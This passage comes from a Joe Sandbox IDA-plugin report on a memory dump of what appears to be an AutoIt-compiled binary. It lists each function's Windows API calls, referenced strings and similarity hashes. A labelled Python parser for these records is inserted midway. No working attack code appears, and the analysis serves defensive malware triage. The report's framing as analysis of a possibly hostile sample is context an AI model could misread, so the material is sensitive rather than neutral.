                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 1411258926-22481851
                                                      • Opcode ID: e8ca1aa5cda97f00461e91cc9d637e7319e902a290d3c82f72597091f910040c
                                                      • Instruction ID: da64e865793f63624ad14518dee65291d8a36a645fd578ae4a4a5f5597dc4918
                                                      • Opcode Fuzzy Hash: e8ca1aa5cda97f00461e91cc9d637e7319e902a290d3c82f72597091f910040c
                                                      • Instruction Fuzzy Hash: 50410972C1462DAADF11EBA8EC45DEEB778FF14311F404069E915E32A1DB356D08CBA1
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00880E31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 1d9a52472115600fdf7e3bbc0a65a56ba8545b37b8d33219cef688aae38089f0
                                                      • Instruction ID: 8ded8458a9703bb7604ff7c0e9bb436a376cb8e98ad22b7215f7e2e10e160940
                                                      • Opcode Fuzzy Hash: 1d9a52472115600fdf7e3bbc0a65a56ba8545b37b8d33219cef688aae38089f0
                                                      • Instruction Fuzzy Hash: 2741393150026A8BCF60EF54E895AEF3764FF11304F944464FEA69B292DB30A95ECF61
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0083E2A0,00000010,?,Bad directive syntax error,0088F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0085F7C2
                                                      • LoadStringW.USER32(00000000,?,0083E2A0,00000010), ref: 0085F7C9
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • _wprintf.LIBCMT ref: 0085F7FC
                                                      • __swprintf.LIBCMT ref: 0085F81E
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0085F88D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 1506413516-4153970271
                                                      • Opcode ID: b84edae7db79e304b17f0ecfba4b83ba3f5434d91425f4e86bdf9b8b5ca4effd
                                                      • Instruction ID: 407a61576e5e077e4f8dde66baf9cd76d6d947f75c28e12ac15f72f2e2cef6b3
                                                      • Opcode Fuzzy Hash: b84edae7db79e304b17f0ecfba4b83ba3f5434d91425f4e86bdf9b8b5ca4effd
                                                      • Instruction Fuzzy Hash: 0E218F3180021DFBDF11EF94CC0AEEE7739FF14304F040465F615A61A2EA35AA58DB51
                                                      APIs
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                        • Part of subcall function 00807924: _memmove.LIBCMT ref: 008079AD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00865330
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00865346
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00865357
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00865369
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0086537A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: SendString$_memmove
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2279737902-1007645807
                                                      • Opcode ID: 0e1d182cc3709d90d97ea7355a3d77e3bdc40fe332c4b6bb0bc4e012091eae38
                                                      • Instruction ID: 2556c2a25e4feb8e9004716ec859fbfd60f3c937925e86c1c2a62d599361975f
                                                      • Opcode Fuzzy Hash: 0e1d182cc3709d90d97ea7355a3d77e3bdc40fe332c4b6bb0bc4e012091eae38
                                                      • Instruction Fuzzy Hash: 09119020E50169B9D760B665CC4ADFFBBBCFBA2F48F100429B521E23D1EEA01D05C6A5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 208665112-3771769585
                                                      • Opcode ID: 6350eefc7dec8e10a15e289910c813a47cfbc5d5e315979de894fc037f83b965
                                                      • Instruction ID: e0520fb66170b321be990544c16ad36a9c07749c246ff32b66343f5877a056c4
                                                      • Opcode Fuzzy Hash: 6350eefc7dec8e10a15e289910c813a47cfbc5d5e315979de894fc037f83b965
                                                      • Instruction Fuzzy Hash: E011C071500118AFDB20BB38AC4AEEE77ACFB02711F1501B6F645D6192EF748AC18B61
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00864F7A
                                                        • Part of subcall function 0082049F: timeGetTime.WINMM ref: 008204A3
                                                      • Sleep.KERNEL32(0000000A), ref: 00864FA6
                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00864FCA
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00864FEC
                                                      • SetActiveWindow.USER32 ref: 0086500B
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00865019
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00865038
                                                      • Sleep.KERNEL32(000000FA), ref: 00865043
                                                      • IsWindow.USER32 ref: 0086504F
                                                      • EndDialog.USER32(00000000), ref: 00865060
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: 3e7ac9f991f92d96c3fb336b6237f70114eac64edc521fe4da08a1e8c0b9af8f
                                                      • Instruction ID: 924ab241dd1c820d3a73b323c315edc95a44ebb998eecf373d09266aea5548d4
                                                      • Opcode Fuzzy Hash: 3e7ac9f991f92d96c3fb336b6237f70114eac64edc521fe4da08a1e8c0b9af8f
                                                      • Instruction Fuzzy Hash: C7219374204605AFE7119F74ED89F2A3BB9FB54745F251034F202C22B2EB719D60DB62
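Each function record on this page has the same fixed layout: an "APIs" list of resolved imports with their call sites (the indented "Part of subcall function" lines describe callees rather than the function body itself), the memory-dump provenance, and a "Similarity" block carrying the API ID, String ID and Opcode / Instruction hashes. When hundreds of such records have to be correlated (which functions touch a given API, which carry a given string), parsing the text into records is the practical first step. The following parser is an added example and is not part of the Joe Sandbox report or its tooling; it assumes only the layout visible above, and its sample input is an abbreviated copy of the mciSendStringW and EnumThreadWindows records above with the "Associated" lines dropped for brevity.

```python
"""Parse Joe Sandbox function records ("APIs" ... "Similarity" blocks) into
structured objects that can be indexed by API name, string or Opcode ID.
Added example; the record layout is inferred from the report text, and the
sample below is an abbreviated copy of two records from this report."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Section headings that appear, unbulleted, between the bullet lines of a record.
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Matches "Name.MODULE(args), ref: ADDR", "Name.MODULE ref: ADDR" and the
# "Part of subcall function ADDR: Name.MODULE ref: ADDR" variant.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                      # call-site address inside the dumped image
    subcall_of: Optional[str]     # callee address when the call sits inside a subcall


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    similarity: Dict[str, str] = field(default_factory=dict)   # API ID, String ID, hashes
    meta: Dict[str, object] = field(default_factory=dict)      # Source File, Snapshot File, ...

    @property
    def opcode_id(self) -> str:
        return self.similarity.get("Opcode ID", "")

    @property
    def strings(self) -> List[str]:
        # Joe Sandbox joins the referenced strings with '$'; an empty field means none.
        value = self.similarity.get("String ID", "")
        return value.split("$") if value else []


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":          # every record opens with its API list
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m is None:
                continue                # not an API entry; skip rather than guess
            args = m.group("args")
            current.calls.append(ApiCall(
                api=m.group("api"), module=m.group("mod"),
                args=args.split(",") if args is not None else [],
                ref=m.group("ref"), subcall_of=m.group("sub")))
        else:
            # Generic "Key: value" bullets; split on the first colon only, because
            # String ID values themselves may contain colons.
            key, _, value = body.partition(":")
            key, value = key.strip(), value.strip()
            target = current.similarity if section == "Similarity" else current.meta
            if key == "Associated":     # repeated per record, so collect as a list
                target.setdefault(key, []).append(value)
            else:
                target[key] = value
    return records


def direct_calls(rec: FunctionRecord) -> List[str]:
    """APIs called from the function body itself, excluding subcall annotations."""
    return [c.api for c in rec.calls if c.subcall_of is None]


def index_by_api(records: List[FunctionRecord]) -> Dict[str, List[str]]:
    """Map each directly-called API name to the Opcode IDs of the records calling it."""
    idx: Dict[str, List[str]] = {}
    for rec in records:
        for api in sorted(set(direct_calls(rec))):
            idx.setdefault(api, []).append(rec.opcode_id)
    return idx


def find_string(records: List[FunctionRecord], needle: str) -> List[str]:
    """Opcode IDs of records whose String ID list contains the needle as a substring."""
    return [rec.opcode_id for rec in records if any(needle in s for s in rec.strings)]


# Constructed sample: two records from this report, abbreviated.
SAMPLE = """\
APIs
  • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00865330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00865346
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00865369
Strings
Memory Dump Source
• Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_800000_kudo.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: 0e1d182cc3709d90d97ea7355a3d77e3bdc40fe332c4b6bb0bc4e012091eae38
APIs
• timeGetTime.WINMM ref: 00864F7A
• Sleep.KERNEL32(0000000A), ref: 00864FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00864FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00864FEC
• SetActiveWindow.USER32 ref: 0086500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00865019
• EndDialog.USER32(00000000), ref: 00865060
Strings
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• Opcode ID: 3e7ac9f991f92d96c3fb336b6237f70114eac64edc521fe4da08a1e8c0b9af8f
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(rec.opcode_id[:12], direct_calls(rec), rec.strings)
    print(index_by_api(recs).get("SendMessageW"))
```

Feeding the full report text (rather than the abbreviated sample) to `parse_records` gives one record per function block; `index_by_api` then answers questions such as "which functions call gethostbyname" directly, and the Opcode IDs it returns are the stable keys for comparing this dump against other reports.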
                                                      APIs
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • CoInitialize.OLE32(00000000), ref: 0086D5EA
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0086D67D
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0086D691
                                                      • CoCreateInstance.OLE32(00892D7C,00000000,00000001,008B8C1C,?), ref: 0086D6DD
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0086D74C
                                                      • CoTaskMemFree.OLE32(?), ref: 0086D7A4
                                                      • _memset.LIBCMT ref: 0086D7E1
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0086D81D
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0086D840
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0086D847
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0086D87E
                                                      • CoUninitialize.OLE32 ref: 0086D880
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: dab3e0fa95f83ff588f135d28038869c4747c699ca1f94452ba285c2163ea541
                                                      • Instruction ID: 8210dad486e90245289c2c6f9de0d6301c8c65235ef5d3a84d91b38aed999ae0
                                                      • Opcode Fuzzy Hash: dab3e0fa95f83ff588f135d28038869c4747c699ca1f94452ba285c2163ea541
                                                      • Instruction Fuzzy Hash: F5B10D75A00219AFDB04DF68C888DAEBBB9FF48314B158469E909EB251DB30ED41CB51
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 0085C283
                                                      • GetWindowRect.USER32(00000000,?), ref: 0085C295
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0085C2F3
                                                      • GetDlgItem.USER32(?,00000002), ref: 0085C2FE
                                                      • GetWindowRect.USER32(00000000,?), ref: 0085C310
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0085C364
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0085C372
                                                      • GetWindowRect.USER32(00000000,?), ref: 0085C383
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0085C3C6
                                                      • GetDlgItem.USER32(?,000003EA), ref: 0085C3D4
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0085C3F1
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0085C3FE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: c89e1813c1bfa1bdc0af8569c13ab75c565f4e39c0cb5d59c9f73ab352b5da38
                                                      • Instruction ID: 69c15b286a36db3f66afb2f535f5263cb27f2de7028f2ffe5519d15928f350fd
                                                      • Opcode Fuzzy Hash: c89e1813c1bfa1bdc0af8569c13ab75c565f4e39c0cb5d59c9f73ab352b5da38
                                                      • Instruction Fuzzy Hash: 6D513E71B00205AFDB18CFADDD89AAEBBB6FF98311F148129FA15D6291D7709D448B10
                                                      APIs
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      • GetSysColor.USER32(0000000F), ref: 008021D3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: cc3437fbb1081cd8f77a3bafbbc4b7b4d9ec62c5474307fa5696a6a342abf1a9
                                                      • Instruction ID: e228c4ee9728979e75b223ab65a947b01103a9f04edbcbfb34dfb8606d3580f4
                                                      • Opcode Fuzzy Hash: cc3437fbb1081cd8f77a3bafbbc4b7b4d9ec62c5474307fa5696a6a342abf1a9
                                                      • Instruction Fuzzy Hash: 89418E35100140AADB619F6CDC8CBB97B66FB46321F244265FE65CA1E2C7718C82DB61
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0086A90B
                                                      • GetDriveTypeW.KERNEL32(00000061,008B89A0,00000061), ref: 0086A9D5
                                                      • _wcscpy.LIBCMT ref: 0086A9FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: 60049f072ad16dc40a1c87112cc75a6cc0866f54ad00e0feb8d05638d0ec9d1b
                                                      • Instruction ID: d06ad1587b2dfc4f72d67c2f365ce5c4ba02bbc86c10a5196b79826976a354c1
                                                      • Opcode Fuzzy Hash: 60049f072ad16dc40a1c87112cc75a6cc0866f54ad00e0feb8d05638d0ec9d1b
                                                      • Instruction Fuzzy Hash: E7518D311083119FC704EF18D892AAFBBA5FF84344F55482DF5A6E72A2DB319949CA53
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __i64tow__itow__swprintf
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 421087845-2263619337
                                                      • Opcode ID: 6716949ecd26a049a6ef53a3210133e78d2686edabf21dc087afe0abcedf0de4
                                                      • Instruction ID: 2d3cb70a62d1b56c893845242136405ad45504da493a7bb4b2eef34211b142e4
                                                      • Opcode Fuzzy Hash: 6716949ecd26a049a6ef53a3210133e78d2686edabf21dc087afe0abcedf0de4
                                                      • Instruction Fuzzy Hash: 4841B271904209AFDB24AF38DC46A7A73E8FF45304F20447EE589D6393EA35A941CB91
                                                      APIs
                                                      • _memset.LIBCMT ref: 0088716A
                                                      • CreateMenu.USER32 ref: 00887185
                                                      • SetMenu.USER32(?,00000000), ref: 00887194
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00887221
                                                      • IsMenu.USER32(?), ref: 00887237
                                                      • CreatePopupMenu.USER32 ref: 00887241
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0088726E
                                                      • DrawMenuBar.USER32 ref: 00887276
                                                      Strings
                                                      Memory Dump Source
